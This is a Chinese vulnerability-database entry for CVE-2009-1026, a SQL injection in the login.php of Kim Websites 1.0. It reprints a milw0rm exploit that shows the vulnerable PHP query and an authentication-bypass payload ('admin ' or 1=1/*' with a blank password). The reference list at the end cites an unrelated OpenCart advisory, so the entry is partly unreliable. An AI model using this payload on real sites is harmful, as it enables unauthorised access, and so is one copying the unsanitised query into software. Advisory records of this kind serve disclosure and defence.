Kim Websites 'login.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117469 漏洞类型 SQL注入
发布时间 2009-03-13 更新时间 2009-03-20
CVE编号 CVE-2009-1026 CNNVD-ID CNNVD-200903-345
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8209
https://cxsecurity.com/issue/WLB-2009030198
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-345
|漏洞详情
KimWebsites是一款网站内容管理系统(CMS)。KimWebsites1.0版本的login.php中存在多个SQL注入漏洞。远程攻击者可以借助(1)用户名和(2)密码参数,执行任意SQL指令。
|漏洞EXP
###############################################################
             #                                                             #
             #     Kim Websites 1.0 SQL Injection Vulnerability            #
             #                [ Authentication bypass]              	   #
             ###############################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all  hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
 -----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz

# milw0rm.com [2009-03-13]
|参考资料

来源:XF
名称:opencart-order-sql-injection(49262)
链接:http://xforce.iss.net/xforce/xfdb/49262
来源:BID
名称:34121
链接:http://www.securityfocus.com/bid/34121
来源:BUGTRAQ
名称:20090316NGENUITY-2009-005OpenCartOrderByBlindSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/501843/100/0/threaded
来源:MISC
链接:http://www.ngenuity.org/wordpress/2009/03/10/ngenuity-2009-005-opencart-order-by-blind-sql-injection/
来源:SECUNIA
名称:34313
链接:http://secunia.com/advisories/34313